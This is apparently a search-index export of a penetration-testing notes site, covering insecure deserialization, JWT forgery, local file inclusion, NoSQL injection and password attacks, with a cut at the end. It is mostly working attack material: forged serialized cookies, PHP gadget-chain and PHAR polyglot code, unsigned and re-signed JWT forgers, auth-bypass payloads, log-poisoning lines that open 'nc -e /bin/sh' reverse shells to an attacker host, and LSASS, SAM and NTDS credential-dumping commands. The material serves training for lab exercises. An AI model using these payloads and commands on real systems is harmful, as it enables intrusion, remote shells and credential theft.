                        Additionally, if we spot a base64-encoded session cookie containing a serialized object, such as this PHP one, we can try to modify it.

                        Cookie: session=Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJuYW1lIjtzOjY6IndpZW5lciI7czoxMjoiYWNjZXNzX3Rva2VuIjtzOjMyOiJieno5ZmJ2OHV6YXM3MTRlcnJuaGExcTVwcGJ6eWY1aCI7fQ%3d%3d\n

                        Decoded from base64

                        O:4:\"User\":2:{s:8:\"username\";s:6:\"wiener\";s:12:\"access_token\";s:32:\"bzz9fbv8uzas714errnha1q5ppbzyf5h\";}\n

                        s refers to a string and i to an integer. We could modify both the value and its data type, changing the object to:

                        O:4:\"User\":2:{s:8:\"username\";s:13:\"administrator\";s:12:\"access_token\";i:0:\"\";}\n

                        Afterwards, base64-encode the modified object and insert it as the session cookie:

                        Cookie: session=Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJuYW1lIjtzOjEzOiJhZG1pbmlzdHJhdG9yIjtzOjEyOiJhY2Nlc3NfdG9rZW4iO2k6MDt9\n

                        Explanation: the attacker replaced the access_token string with the integer 0. When the server loosely compares the stored token against this value, 0 == \"<stored token>\" evaluates to true as long as the stored token does not start with a number, enabling an authentication bypass. Note that this is only possible because deserialization preserves the data type. If the code fetched the value from the request directly, the 0 would be converted to a string and the condition would evaluate to false.
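
                        A quick demonstration of the juggling, assuming PHP 7.x semantics (PHP 8 changed string-to-number comparisons, so always verify against the target's version):

                        <?php\n// Loose (==) vs. strict (===) comparison.\nvar_dump(0 == 'Example_String');   // bool(true)  in PHP < 8\nvar_dump(0 === 'Example_String');  // bool(false) regardless of version\nvar_dump('5' == 5);                // bool(true)  -- types are juggled\nvar_dump('5' === 5);               // bool(false) -- types must also match\n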

                        Burpsuite lab

                        Burpsuite Lab: Modifying serialized data types

                        ","tags":["web","pentesting","attack"]},{"location":"webexploitation/insecure-deserialization/#3-abuse-application-functionality","title":"3. Abuse application functionality","text":"

                        A website's functionality might also perform dangerous operations on data from a deserialized object. In this case, you can use insecure deserialization to pass in unexpected data and leverage the related functionality to do damage.

                        For example, as part of a website's \"Delete user\" functionality, the user's profile picture is deleted by accessing the file path in the\u00a0$user->image_location\u00a0attribute. If this\u00a0$user\u00a0was created from a serialized object, an attacker could exploit this by passing in a modified object with the\u00a0image_location\u00a0set to an arbitrary file path.

                        Burpsuite lab

                        Burpsuite Lab: Using application functionality to exploit insecure deserialization

                        ","tags":["web","pentesting","attack"]},{"location":"webexploitation/insecure-deserialization/#4-magic-methods","title":"4. Magic methods","text":"

                        Magic methods are a special subset of methods that are invoked automatically whenever a particular event or scenario occurs. \u00a0One of the most common examples in PHP is\u00a0__construct(), which is invoked whenever an object of the class is instantiated, similar to Python's\u00a0__init__. Typically, constructor magic methods like this contain code to initialize the attributes of the instance. However, magic methods can be customized by developers to execute any code they want.

                        PHP -> Most importantly in this context, some languages have magic methods that are invoked automatically\u00a0during\u00a0the deserialization process. For example, PHP's\u00a0unserialize()\u00a0method looks for and invokes an object's\u00a0__wakeup()\u00a0magic method.

                        JAVA -> In Java deserialization, the same applies to the\u00a0ObjectInputStream.readObject()\u00a0method, which is used to read data from the initial byte stream and essentially acts like a constructor for \"re-initializing\" a serialized object. However,\u00a0Serializable\u00a0classes can also declare their own\u00a0readObject()\u00a0method as follows:

                        private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException \n{ \n    // implementation \n}\n

                        A\u00a0readObject()\u00a0method declared in exactly this way acts as a magic method that is invoked during deserialization. This allows the class to control the deserialization of its own fields more closely.

                        You should pay close attention to any classes that contain these types of magic methods. They allow you to pass data from a serialized object into the website's code before the object is fully deserialized. This is the starting point for creating more advanced exploits.

                        ","tags":["web","pentesting","attack"]},{"location":"webexploitation/insecure-deserialization/#5-inject-arbitrary-objects","title":"5. Inject arbitrary objects","text":"

                        The methods available to an object are determined by its class. Deserialization methods do not typically check what they are deserializing. This means that you can pass in objects of any serializable class that is available to the website, and the object will be deserialized.

                        The fact that this object is not of the expected class does not matter. The unexpected object type might cause an exception in the application logic, but the malicious object will already be instantiated by then.
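
                        A minimal sketch of the idea, using a hypothetical CustomTemplate class standing in for any class on the target with a dangerous magic method: its __destruct() fires even though the application never expected this class in the cookie.

                        <?php\n// Hypothetical class defined somewhere in the application's code base.\nclass CustomTemplate {\n    public $lock_file_path;\n\n    public function __destruct() {\n        // Dangerous sink: runs automatically when the object is destroyed.\n        if (file_exists($this->lock_file_path)) {\n            unlink($this->lock_file_path);\n        }\n    }\n}\n\n// Attacker-supplied cookie: an object of a class the code never expected.\n$payload = 'O:14:\"CustomTemplate\":1:{s:14:\"lock_file_path\";s:23:\"/home/carlos/morale.txt\";}';\n$object  = unserialize($payload); // the object is instantiated here...\n// ...and __destruct() fires at the end of the script, deleting the file.\n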

                        Burpsuite lab

                        Burpsuite Lab: Arbitrary object injection in PHP

                        ","tags":["web","pentesting","attack"]},{"location":"webexploitation/insecure-deserialization/#6-gadget-chains","title":"6. Gadget chains","text":"

                        Classes containing these deserialization magic methods can also be used to initiate more complex attacks involving a long series of method invocations, known as a \"gadget chain\".

                        A \"gadget\" is a snippet of code that exists in the application that can help an attacker to achieve a particular goal. An individual gadget may not directly do anything harmful with user input. However, the attacker's goal might simply be to invoke a method that will pass their input into another gadget. By chaining multiple gadgets together in this way, an attacker can potentially pass their input into a dangerous \"sink gadget\", where it can cause maximum damage.

                        It is important to note that the vulnerability is the deserialization of user-controllable data, not the mere presence of a gadget chain in the website's code or any of its libraries.
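
                        A toy sketch with hypothetical class names: neither class is harmful on its own, but chaining them routes attacker-controlled data into a command-execution sink.

                        <?php\n// Gadget 1: its __destruct() merely forwards a property to another object.\nclass CacheFlusher {\n    public $handler;\n    public $command;\n\n    public function __destruct() {\n        $this->handler->handle($this->command);\n    }\n}\n\n// Gadget 2, the \"sink\": a method that executes whatever it receives.\nclass ShellTaskRunner {\n    public function handle($task) {\n        system($task); // dangerous sink\n    }\n}\n\n// The attacker serializes a CacheFlusher whose handler is a ShellTaskRunner.\n$gadget = new CacheFlusher();\n$gadget->handler = new ShellTaskRunner();\n$gadget->command = 'id';\n\n$payload = serialize($gadget);\n// When the target runs unserialize($payload), destruction of the object\n// graph ends in system('id') without the attacker calling it directly.\n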

                        ","tags":["web","pentesting","attack"]},{"location":"webexploitation/insecure-deserialization/#prebuilt-gadget-chains","title":"Prebuilt gadget chains","text":"

                        Java: ysoserial

                        PHP: phpggc

                        About ysoserial: not all of the gadget chains in ysoserial enable you to run arbitrary code. Instead, they may be useful for other purposes. For example, you can use the following ones to help you quickly detect insecure deserialization on virtually any server:

                        • The URLDNS chain triggers a DNS lookup for a supplied URL. Most importantly, it does not rely on the target application using a specific vulnerable library, and it works in any known Java version. This makes it the most universal gadget chain for detection purposes. If you spot a serialized object in the traffic, you can use this chain to generate an object that triggers a DNS interaction with the Burp Collaborator server. If it does, you can be sure that deserialization occurred on your target.

                        • JRMPClient is another universal chain that you can use for initial detection. It causes the server to try to establish a TCP connection to the supplied IP address. Note that you need to provide a raw IP address rather than a hostname. This chain may be useful in environments where all outbound traffic is firewalled, including DNS lookups. Try generating payloads with two different IP addresses: a local one and a firewalled, external one. If the application responds immediately for the local address but hangs for the external one, the gadget chain worked, because the server tried to connect to the firewalled address. This subtle time difference in responses can help you detect whether deserialization occurs on the server, even in blind cases.

                        Burpsuite lab

                        Burpsuite Lab: Exploiting Java deserialization with Apache Commons

                        ","tags":["web","pentesting","attack"]},{"location":"webexploitation/insecure-deserialization/#documented-gadget-chains","title":"Documented gadget chains","text":"

                        There may not always be a dedicated tool available for exploiting known gadget chains in the framework used by the target application. In this case, it's always worth looking online to see if there are any documented exploits that you can adapt manually.

                        Burpsuite lab

                        Burpsuite Lab: Exploiting Ruby deserialization using a documented gadget chain

                        ","tags":["web","pentesting","attack"]},{"location":"webexploitation/insecure-deserialization/#7-your-own-exploit","title":"7. Your own exploit","text":"","tags":["web","pentesting","attack"]},{"location":"webexploitation/insecure-deserialization/#8-phar-deserialization","title":"8. PHAR deserialization","text":"

                        PHP provides several URL-style wrappers that you can use for handling different protocols when accessing file paths. One of these is the\u00a0phar://\u00a0wrapper, which provides a stream interface for accessing PHP Archive (.phar) files.

                        The PHP documentation reveals that\u00a0PHAR\u00a0manifest files contain serialized metadata. Crucially, if you perform any filesystem operations on a\u00a0phar://\u00a0stream, this metadata is implicitly deserialized.

                        This means that a\u00a0phar://\u00a0stream can potentially be a vector for exploiting insecure deserialization.

                        The explanation: This technique requires you to upload the\u00a0PHAR\u00a0to the server somehow. One approach is to use an image upload functionality, for example. If you are able to create a polyglot file, with a\u00a0PHAR\u00a0masquerading as a simple\u00a0JPG, you can sometimes bypass the website's validation checks. If you can then force the website to load this polyglot \"JPG\" from a\u00a0phar://\u00a0stream, any harmful data you inject via the\u00a0PHAR\u00a0metadata will be deserialized. As the file extension is not checked when PHP reads a stream, it does not matter that the file uses an image extension. As long as the class of the object is supported by the website, both the\u00a0__wakeup()\u00a0and\u00a0__destruct()\u00a0magic methods can be invoked in this way, allowing you to potentially kick off a gadget chain using this technique.
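
                        A minimal sketch of building such a polyglot locally, assuming a suitable gadget class (the hypothetical CustomTemplate again) exists on the target and that phar.readonly is set to Off in the local php.ini:

                        <?php\n// Build a PHAR whose manifest metadata carries the gadget object.\nclass CustomTemplate {\n    public $lock_file_path = '/home/carlos/morale.txt';\n}\n\n$phar = new Phar('exploit.phar');\n$phar->startBuffering();\n$phar->addFromString('test.txt', 'text');\n// A stub starting with JPEG magic bytes helps pass naive image checks.\n$phar->setStub(\"\\xff\\xd8\\xff\\n<?php __HALT_COMPILER(); ?>\");\n$phar->setMetadata(new CustomTemplate()); // serialized into the manifest\n$phar->stopBuffering();\nrename('exploit.phar', 'exploit.jpg');\n\n// Upload exploit.jpg, then force any filesystem operation on the target,\n// e.g. file_exists('phar://./uploads/exploit.jpg/test.txt'):\n// the metadata is implicitly deserialized and __destruct() fires.\n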

                        ","tags":["web","pentesting","attack"]},{"location":"webexploitation/insecure-deserialization/#9-memory-corruption","title":"9. Memory corruption","text":"

                        Even without the use of gadget chains, it is still possible to exploit insecure deserialization. If all else fails, there are often publicly documented memory corruption vulnerabilities that can be exploited via insecure deserialization. Deserialization methods, such as PHP's unserialize(), are rarely hardened against these kinds of attacks and expose a huge amount of attack surface.

                        ","tags":["web","pentesting","attack"]},{"location":"webexploitation/jwt-attacks/","title":"Json Web Token attacks","text":"Resources

                        https://github.com/Crypto-Cat/CTF/tree/main/web/WebSecurityAcademy/jwt

                        JSON web tokens (JWTs) are a standardized format for sending cryptographically signed JSON data between systems.

                        The server that issues the token typically generates the signature by hashing the header and payload. In some cases, they also encrypt the resulting hash.

                        • As the signature is directly derived from the rest of the token, changing a single byte of the header or payload results in a mismatched signature.

                        • Without knowing the server's secret signing key, it shouldn't be possible to generate the correct signature for a given header or payload.

                        JSON Web Signature (JWS) - The contents of the token are signed but not encrypted; this is the common, standard form of a JWT.

                        JSON Web Encryption (JWE) - The contents of the token are encrypted.

                        ","tags":["web","pentesting","jwt"]},{"location":"webexploitation/jwt-attacks/#jwt-signature-verification-attack","title":"JWT signature verification attack","text":"","tags":["web","pentesting","jwt"]},{"location":"webexploitation/jwt-attacks/#1-server-not-verifying-the-signature","title":"1. Server not verifying the signature","text":"

                        If the server doesn't verify the signature properly, there's nothing to stop an attacker from making arbitrary changes to the rest of the token.

                        For example, consider a JWT containing the following claims:

                        { \"username\": \"carlos\", \"isAdmin\": false }

                        If the server identifies the session based on this\u00a0username, modifying its value might enable an attacker to impersonate other logged-in users. Similarly, if the\u00a0isAdmin\u00a0value is used for access control, this could provide a simple vector for privilege escalation.

                        ","tags":["web","pentesting","jwt"]},{"location":"webexploitation/jwt-attacks/#2-accepting-arbitrary-signatures","title":"2. Accepting arbitrary signatures","text":"

                        JWT libraries typically provide one method for verifying tokens and another that just decodes them. For example, the Node.js library\u00a0jsonwebtoken\u00a0has\u00a0verify()\u00a0and\u00a0decode().

                        Occasionally, developers confuse these two methods and only pass incoming tokens to the\u00a0decode()\u00a0method. This effectively means that the application doesn't verify the signature at all.

                        The payload can then be changed without any limitation.

                        ","tags":["web","pentesting","jwt"]},{"location":"webexploitation/jwt-attacks/#3-accepting-tokens-with-no-signature","title":"3. Accepting tokens with no signature","text":"

                        Otherwise called the \"none\" attack. JWTs can be signed using a range of different algorithms, but can also be left unsigned. In this case, the\u00a0alg\u00a0parameter is set to\u00a0none, which indicates a so-called \"unsecured JWT\".

                        \"alg\" parameter can therefore be set to:

                        none\nNone\nNONE\nNoNE\n

                        Then, the attacker can modify the payload.

                        Finally, the payload part must still be terminated with a trailing dot.
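
                        A minimal sketch of forging such an unsigned token (the claim names are illustrative):

                        <?php\n// Build an unsigned (\"alg\": \"none\") JWT from scratch.\nfunction b64url(string $data): string {\n    return rtrim(strtr(base64_encode($data), '+/', '-_'), '=');\n}\n\n$header  = b64url(json_encode(['typ' => 'JWT', 'alg' => 'none']));\n$payload = b64url(json_encode(['username' => 'administrator', 'isAdmin' => true]));\n\n// The signature part is empty, but the trailing dot must remain.\n$token = $header . '.' . $payload . '.';\necho $token, PHP_EOL;\n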

                        ","tags":["web","pentesting","jwt"]},{"location":"webexploitation/jwt-attacks/#4-brute-forcing-secret-keys","title":"4. Brute-forcing secret keys","text":"

                        When implementing JWT applications, developers sometimes make mistakes like forgetting to change default or placeholder secrets.

                        jwt secrets payloads

                        https://github.com/wallarm/jwt-secrets/blob/master/jwt.secrets.list

                        hashcat -a 0 -m 16500 <jwt> <wordlist>\n

                        If you run the command more than once, you need to include the\u00a0--show\u00a0flag to output the results.

                        Once you have identified the secret key, you can use it to generate a valid signature with the JWT Editor extension (Keys tab).

                        Then, send your request to Repeater. In Repeater, go to the JSON Web Token tab, modify the payload, click Sign, and select your key.
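
                        Equivalently, a minimal sketch of re-signing the modified token by hand, assuming the secret was recovered (the value 'secret1' is a placeholder):

                        <?php\nfunction b64url(string $data): string {\n    return rtrim(strtr(base64_encode($data), '+/', '-_'), '=');\n}\n\n$secret  = 'secret1'; // placeholder: the key recovered with hashcat\n$header  = b64url(json_encode(['typ' => 'JWT', 'alg' => 'HS256']));\n$payload = b64url(json_encode(['username' => 'administrator']));\n\n// HS256 = HMAC-SHA256 over \"<header>.<payload>\", keyed with the secret.\n$signature = b64url(hash_hmac('sha256', $header . '.' . $payload, $secret, true));\n\necho $header . '.' . $payload . '.' . $signature, PHP_EOL;\n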

                        ","tags":["web","pentesting","jwt"]},{"location":"webexploitation/jwt-attacks/#5-jwt-header-parameter-injections","title":"5. JWT header parameter injections","text":"

                        According to the JWS specification, only the\u00a0alg\u00a0header parameter is mandatory. In practice, however, JWT headers (also known as JOSE headers) often contain several other parameters. The following ones are of particular interest to attackers.

                        • jwk\u00a0(JSON Web Key) - Provides an embedded JSON object representing the key.

                        • jku\u00a0(JSON Web Key Set URL) - Provides a URL from which servers can fetch a set of keys containing the correct key.

                        • kid\u00a0(Key ID) - Provides an ID that servers can use to identify the correct key in cases where there are multiple keys to choose from. Depending on the format of the key, this may have a matching\u00a0kid\u00a0parameter.

                        ","tags":["web","pentesting","jwt"]},{"location":"webexploitation/jwt-attacks/#51-injecting-self-signed-jwts-via-the-jwk-parameter","title":"5.1. Injecting self-signed JWTs via the jwk parameter","text":"

                        The JSON Web Signature (JWS) specification describes an optional\u00a0jwk\u00a0header parameter, which servers can use to embed their public key directly within the token itself in JWK format.

                        How to perform the attack with Burpsuite:

                        1. With the extension loaded, in Burp's main tab bar, go to the JWT Editor Keys tab.\n\n2. Generate a new RSA key.\n\n3. Send a request containing a JWT to Burp Repeater.\n\n4. In the message editor, switch to the extension-generated JSON Web Token tab and modify the token's payload however you like.\n\n5. Click Attack, then select Embedded JWK. When prompted, select your newly generated RSA key.\n\n6. Send the request to test how the server responds.\n
                        ","tags":["web","pentesting","jwt"]},{"location":"webexploitation/jwt-attacks/#52-injecting-self-signed-jwts-via-the-jku-parameter","title":"5.2. Injecting self-signed JWTs via the jku parameter","text":"

                        Instead of embedding public keys directly using the\u00a0jwk\u00a0header parameter, some servers let you use the\u00a0jku\u00a0(JWK Set URL) header parameter to reference a JWK Set containing the key. When verifying the signature, the server fetches the relevant key from this URL.

                        A JWK Set is a JSON object containing an array of JWKs representing different keys. You can see an example of this below.

                        { \"keys\": [ { \"kty\": \"RSA\", \"e\": \"AQAB\", \"kid\": \"75d0ef47-af89-47a9-9061-7c02a610d5ab\", \"n\": \"o-yy1wpYmffgXBxhAUJzHHocCuJolwDqql75ZWuCQ_cb33K2vh9mk6GPM9gNN4Y_qTVX67WhsN3JvaFYw-fhvsWQ\" }, { \"kty\": \"RSA\", \"e\": \"AQAB\", \"kid\": \"d8fDFo-fS9-faS14a9-ASf99sa-7c1Ad5abA\", \"n\": \"fc3f-yy1wpYmffgXBxhAUJzHql79gNNQ_cb33HocCuJolwDqmk6GPM4Y_qTVX67WhsN3JvaFYw-dfg6DH-asAScw\" } ] }`\n

                        JWK Sets like this are sometimes exposed publicly via a standard endpoint, such as\u00a0/.well-known/jwks.json.

                        So a way to trick this validation is by creating our own set of RSA keys.

                        Then, have a server serving these keys.

                        Then, modify the payload of the JWT.

                        And finally, modify the header, adding a kid corresponding to our crafted RSA key and a jku parameter pointing to our server serving the keys. With this configuration we can use JWT Editor in Burpsuite to sign the newly crafted JWT.

                        ","tags":["web","pentesting","jwt"]},{"location":"webexploitation/jwt-attacks/#53-injecting-self-signed-jwts-via-the-kid-parameter","title":"5.3. Injecting self-signed JWTs via the kid parameter","text":"","tags":["web","pentesting","jwt"]},{"location":"webexploitation/local-file-inclusion-lfi/","title":"LFI attack - Local File Inclusion","text":"OWASP

                        OWASP Web Security Testing Guide 4.2 > 5. Authorization Testing > 5.1. Testing Directory Traversal File Include

                        ID Link to Hackinglife Link to OWASP Description 5.1 WSTG-ATHZ-01 Testing Directory Traversal File Include - Identify injection points that pertain to path traversal. - Assess bypassing techniques and identify the extent of path traversal (dot-dot-slash attack, Local/Remote file inclusion)

                        Local File Inclusion (LFI) is a type of security vulnerability that occurs when an application allows an attacker to include files on the server through the web browser. File inclusion in web applications refers to the practice of including external files, often scripts or templates, into a web page dynamically. It is a fundamental concept used to create dynamic and modular web applications.

                        LFI vulnerabilities typically occur due to poor input validation or lack of proper security mechanisms in web applications. Attackers exploit these vulnerabilities by manipulating input parameters that are used to specify file paths or filenames within the application:

                        • File Inclusion Functions: Functions like include(), require(), or file_get_contents() that accept user-controlled input for file paths.
                        • HTTP Parameters: Input fields in web forms or query parameters in URLs.
                        • Cookies: If an application uses cookies to determine the file to include.
                        • Session Variables: If session data can be manipulated to control file inclusion.

                        Impact:

                        • Information Disclosure: Attackers can read sensitive files, including configuration files, user data, and source code, exposing critical information.
                        • Remote Code Execution: In some cases, LFI can lead to the execution of arbitrary code if an attacker can include malicious PHP or other script files.
                        • Directory Traversal: LFI attacks can allow an attacker to navigate the directory structure, potentially leading to further vulnerabilities or unauthorized access.

                        LFI (Local File Inclusion): The primary objective of an LFI attack is to include a file from the server within the context of a web application, either to display its contents or to get it executed.

                        Directory Traversal: Directory Traversal, also known as Path Traversal, focuses on navigating the file system's directory structure to access files or directories outside the intended path. While this can lead to LFI, the primary goal is often broader, encompassing the ability to read, modify, or delete files and directories.

                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/local-file-inclusion-lfi/#interesting-files","title":"Interesting files","text":"

                        Interesting Windows files Interesting Linux files

                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/local-file-inclusion-lfi/#procselfenviron","title":"/proc/self/environ","text":"

                        This file contains the process's environment variables. One of those variables might be HTTP_USER_AGENT, the user agent sent by the client to the server. So, using an intercepting proxy, we could modify that header to be, let's say:

                        <?php phpinfo(); ?>\n

                        When it comes to getting a shell here, we can use the PHP function passthru(), which is similar to exec():

                        passthru\u00a0\u2014\u00a0Execute an external program and display raw output

                        In this case, we would be adding in the user agent header the reverse shell:

                        <?php passthru(\"nc -e /bin/sh <attacker IP> <attacker port>\"); ?>\n
                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/local-file-inclusion-lfi/#varlogauthlog-or-varlogapache2accesslog","title":"/var/log/auth.log or /var/log/apache2/access.log","text":"

                        If we have the ability to read a log file, then we can check whether we can also write to it in a malicious way.

                        For instance, with /var/log/auth.log, we can try an SSH connection and see how these attempts are recorded in the file. Then, instead of using a real username, we can set some PHP code:

                        ssh \"<?passthru('nc -e /bin/sh <attacker IP> <attacker port>');?>\"@$ip \n

                        But there might be problems with blank spaces, slashes and so on, so one thing you can do is base64-encode your netcat command and tell the function to decode it before executing it:

                        # base64 encode your netcat command: nc -e /bin/sh <attacker IP> <attacker port>\nssh \"<?php passthru(base64_decode('<base64 encoded text>')); ?>\"@$ip \n

                        Now just set up a netcat listener on your Kali attacker machine.

                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/local-file-inclusion-lfi/#tools-and-payloads","title":"Tools and payloads","text":"
                        • See updated chart: Attacks and tools for web pentesting.
                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/nosql-injection/","title":"NoSQL injection","text":"

                        Dictionary for NoSQL injections.

                        Examples of NoSQL databases: Redis, MongoDB.

                        SQL stands for Structured Query Language. NoSQL injection is a security vulnerability that occurs in applications that use NoSQL databases. It is a type of attack in which an attacker manipulates a NoSQL database query by injecting malicious input, leading to unauthorized access, data leakage, or unintended operations. In traditional SQL injection attacks, attackers exploit vulnerabilities by inserting malicious SQL code into input fields that are concatenated with database queries. Similarly, in NoSQL injection, attackers exploit weaknesses in the application's handling of user-supplied input to manipulate NoSQL database queries.

                        How does a NoSQL injection work? Explanation:

                        # MongoDB query\nvar query = {\nusername: username,\npassword: password\n};\n\n# Perform query to check if credentials are valid\nvar result = db.users.findOne(query);\n\nif (result) {\n// Login successful\n} else {\n// Login failed\n}\n

                        In this example, the application constructs a MongoDB query using user-supplied values for the username and password fields. If an attacker intentionally provides a specially crafted value, they could potentially exploit a NoSQL injection vulnerability. For instance, an attacker might enter the following value as the username parameter:

                        $gt:\"\"\n

                        The attacker could potentially bypass the login mechanism and gain unauthorized access.
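
                        A sketch of what the vulnerable server side might look like, assuming the mongodb PHP extension and a hypothetical app.users collection:

                        <?php\n// Hypothetical vulnerable login check.\n$manager = new MongoDB\\Driver\\Manager('mongodb://localhost:27017');\n\n// With a body of username[$ne]=1&password[$ne]=1, PHP parses each\n// parameter as an array: ['$ne' => '1'] -- a MongoDB operator, not a string.\n$filter = [\n    'username' => $_POST['username'],\n    'password' => $_POST['password'],\n];\n\n$cursor = $manager->executeQuery('app.users', new MongoDB\\Driver\\Query($filter));\n// The filter now matches any document whose fields are \"not equal\" to 1,\n// so a user is returned and authentication is bypassed.\n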

                        Typical payloads:

                        # Payload\nusername[$ne]=1&password[$ne]=1\n# Use case/Function: Not equals to (Auth Bypass)\n\n# Payload\nusername[$regex]=^adm&password[$ne]=1\n# Use case/Function: Checks a regular expression (Auth Bypass)\n\n# Payload\nusername[$regex]=.{25}&pass[$ne]=1\n# Use case/Function: Checks regex to find the length of a value\n\n# Payload\nusername[$eq]=admin&password[$ne]=1\n# Use case/Function: Equals to.\n\n# Payload\nusername[$ne]=admin&pass[$gt]=s\n# Use case/Function: Greater than.\n

                        Example of a user search form: submitting the not-equal operator (e.g. username[$ne]=admin) will return all users except for \"admin\".

                        ","tags":["pentesting","web","pentesting"]},{"location":"webexploitation/password-attacks/","title":"Password attacks","text":"","tags":["OSCP"]},{"location":"webexploitation/password-attacks/#connecting-to-target","title":"Connecting to Target","text":"
                        # CLI-based tool used to connect to a Windows target using the Remote Desktop Protocol\nxfreerdp /v:<ip> /u:htb-student /p:HTB_@cademy_stdnt!\n
                        # Uses Evil-WinRM to establish a Powershell session with a target. \nevil-winrm -i <ip> -u user -p password\n
                        # Uses SSH to connect to a target using a specified user.\nssh user@<ip>\n
                        # Uses smbclient to connect to an SMB share using a specified user.\nsmbclient -U user \\\\\\\\<ip>\\\\SHARENAME\n
                        # Uses smbserver.py to create a share on a linux-based attack host. Can be useful when needing to transfer files from a target to an attack host.\npython3 smbserver.py -smb2support CompData /home/<nameofuser>/Documents/\n
                        ","tags":["OSCP"]},{"location":"webexploitation/password-attacks/#password-mutations","title":"Password mutations","text":"
                        # Uses cewl to generate a wordlist based on keywords present on a website.\ncewl https://www.inlanefreight.com -d 4 -m 6 --lowercase -w inlane.wordlist\n
                        # Uses Hashcat to generate a rule-based word list.\nhashcat --force password.list -r custom.rule --stdout > mut_password.list\n
                        # Uses the username-anarchy tool in conjunction with a pre-made list of first and last names to generate a list of potential usernames.\n./username-anarchy -i /path/to/listoffirstandlastnames.txt\n
                        # Uses Linux-based commands curl, awk, grep and tee to download a list of file extensions to be used in searching for files that could contain passwords.\ncurl -s https://fileinfo.com/filetypes/compressed | html2text | awk '{print tolower($1)}' | grep \"\\.\" | tee -a compressed_ext.txt\n
                        ","tags":["OSCP"]},{"location":"webexploitation/password-attacks/#remote-password-attacks","title":"Remote Password Attacks","text":"
                        # Uses CrackMapExec over WinRM to attempt to brute force user names and passwords specified hosted on a target.\ncrackmapexec winrm <ip> -u user.list -p password.list\n
                        # Uses CrackMapExec to enumerate smb shares on a target using a specified set of credentials. \ncrackmapexec smb <ip> -u \"user\" -p \"password\" --shares\n
                        # Uses Hydra in conjunction with a user list and password list to attempt to crack a password over the specified service.\nhydra -L user.list -P password.list <service>://<ip>\n
                        # Uses Hydra in conjunction with a username and password list to attempt to crack a password over the specified service.\nhydra -l username -P password.list <service>://<ip>\n
                        # Uses Hydra in conjunction with a user list and password to attempt to crack a password over the specified service.\nhydra -L user.list -p password <service>://<ip>  \n
                        # Uses Hydra in conjunction with a list of credentials to attempt to login to a target over the specified service. This can be used to attempt a credential stuffing attack.\nhydra -C <user_pass.list> ssh://<IP>\n
                        # Uses CrackMapExec in conjunction with admin credentials to dump password hashes stored in SAM, over the network. \ncrackmapexec smb <ip> --local-auth -u <username> -p <password> --sam\n
                        # Uses CrackMapExec in conjunction with admin credentials to dump lsa secrets, over the network. It is possible to get clear-text credentials this way. \ncrackmapexec smb <ip> --local-auth -u <username> -p <password> --lsa\n
                        # Uses CrackMapExec in conjunction with admin credentials to dump hashes from the ntds file over a network. \ncrackmapexec smb <ip> -u <username> -p <password> --ntds\n
                        # Uses Evil-WinRM to establish a Powershell session with a Windows target using a user and password hash. This is one type of `Pass-The-Hash` attack.\nevil-winrm -i <ip>  -u  Administrator -H \"<passwordhash>\" \n
                        ","tags":["OSCP"]},{"location":"webexploitation/password-attacks/#windows-local-password-attacks","title":"Windows Local Password Attacks","text":"
                        # A command-line-based utility in Windows used to list running processes.\ntasklist /svc                        \n
                        # Uses Windows command-line based utility findstr to search for the string \"password\" in many different file type.\nfindstr /SIM /C:\"password\" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml\n
                        # A Powershell cmdlet is used to display process information. Using this with the LSASS process can be helpful when attempting to dump LSASS process memory from the command line. \nGet-Process lsass\n
                        # Uses rundll32 in Windows to create a LSASS memory dump file. This file can then be transferred to an attack box to extract credentials. \nrundll32 C:\\windows\\system32\\comsvcs.dll, MiniDump 672 C:\\lsass.dmp full\n
                        # Uses Pypykatz to parse and attempt to extract credentials & password hashes from an LSASS process memory dump file. \npypykatz lsa minidump /path/to/lsassdumpfile\n
                        # Uses reg.exe in Windows to save a copy of a registry hive at a specified location on the file system. It can be used to make copies of any registry hive (i.e., hklm\\sam, hklm\\security, hklm\\system).\nreg.exe save hklm\\sam C:\\sam.save\n
                        # Uses move in Windows to transfer a file to a specified file share over the network. \nmove sam.save \\\\<ip>\\NameofFileShare\n
                        # Uses Secretsdump.py to dump password hashes from the SAM database.\npython3 secretsdump.py -sam sam.save -security security.save -system system.save LOCAL\n
                        # Uses Windows command line based tool vssadmin to create a volume shadow copy for `C:`. This can be used to make a copy of NTDS.dit safely. \nvssadmin CREATE SHADOW /For=C:\n
                        # Uses Windows command line based tool copy to create a copy of NTDS.dit for a volume shadow copy of `C:`. \ncmd.exe /c copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy2\\Windows\\NTDS\\NTDS.dit c:\\NTDS\\NTDS.dit \n
                        ","tags":["OSCP"]},{"location":"webexploitation/password-attacks/#linux-local-password-attacks","title":"Linux Local Password Attacks","text":"
                        # Script that can be used to find .conf, .config and .cnf files on a Linux system.\nfor l in $(echo \".conf .config .cnf\");do echo -e \"\\nFile extension: \" $l; find / -name *$l 2>/dev/null | grep -v \"lib\\|fonts\\|share\\|core\" ;done\n\n# Script that can be used to find credentials in specified file types.\nfor i in $(find / -name *.cnf 2>/dev/null | grep -v \"doc\\|lib\");do echo -e \"\\nFile: \" $i; grep \"user\\|password\\|pass\" $i 2>/dev/null | grep -v \"\\#\";done\n\n# Script that can be used to find common database files.\nfor l in $(echo \".sql .db .*db .db*\");do echo -e \"\\nDB File extension: \" $l; find / -name *$l 2>/dev/null | grep -v \"doc\\|lib\\|headers\\|share\\|man\";done\n\n# Uses Linux-based find command to search for text files.\nfind /home/* -type f -name \"*.txt\" -o ! -name \"*.*\"\n\n# Script that can be used to search for common file types used with scripts.\nfor l in $(echo \".py .pyc .pl .go .jar .c .sh\");do echo -e \"\\nFile extension: \" $l; find / -name *$l 2>/dev/null | grep -v \"doc\\|lib\\|headers\\|share\";done\n\n# Script used to look for common types of documents.\nfor ext in $(echo \".xls .xls* .xltx .csv .od* .doc .doc* .pdf .pot .pot* .pp*\");do echo -e \"\\nFile extension: \" $ext; find / -name *$ext 2>/dev/null | grep -v \"lib\\|fonts\\|share\\|core\" ;done\n\n# Uses Linux-based cat command to view the contents of crontab in search of credentials.\ncat /etc/crontab\n\n# Uses Linux-based ls -la command to list all files that start with `cron` contained in the etc directory.\nls -la 